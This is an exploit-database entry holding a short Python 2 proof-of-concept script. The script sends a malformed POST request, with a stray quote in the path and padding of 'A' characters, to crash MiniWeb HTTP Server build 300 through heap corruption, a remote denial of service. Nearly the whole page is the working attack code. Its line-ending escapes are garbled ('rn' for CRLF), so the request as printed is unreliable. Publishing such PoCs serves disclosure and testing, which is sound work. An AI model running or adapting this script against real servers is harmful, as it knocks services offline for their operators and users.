MiniWeb MiniWeb HTTP Server (build 300)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MiniWeb MiniWeb HTTP Server (build 300) - Crash PoC
# Published : 2013-05-13
# Author :
# Previous Title : No-IP Dynamic Update Client (DUC) 2.1.9 - Local IP Address Stack Overflow
# Next Title : Lan Messenger sending PM Buffer Overflow(UNICODE) - Overwrite SEH

# MiniWeb HTTP server (build 300, built on Feb 28 2013) by Stanley Huang
# http://sourceforge.net/projects/miniweb/files/miniweb/0.8/miniweb-win32-20130309.zip/download
# Heap corruption PoC - remote DoS
# Tested on Win7 SP1 RUS
# (x) dmnt 2013

import socket

print 'Mini Web HTTP Server remote DoS exploit by dmntn'
host = "127.0.0.1"
port = 8000
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print 'Connect to host and send payloadn'
stuff = 'POST /'+'"' +' HTTP/1.rn'
stuff+= 'Content-Type: application/x-www-form-urlencodedrn'
stuff+= 'Content-Length: 0rnrn'
stuff+= 'A'*15
s.send(stuff)
print 'Server crashedn'

# Exploit-DB note:
# Tinker with the amount of As to get this to work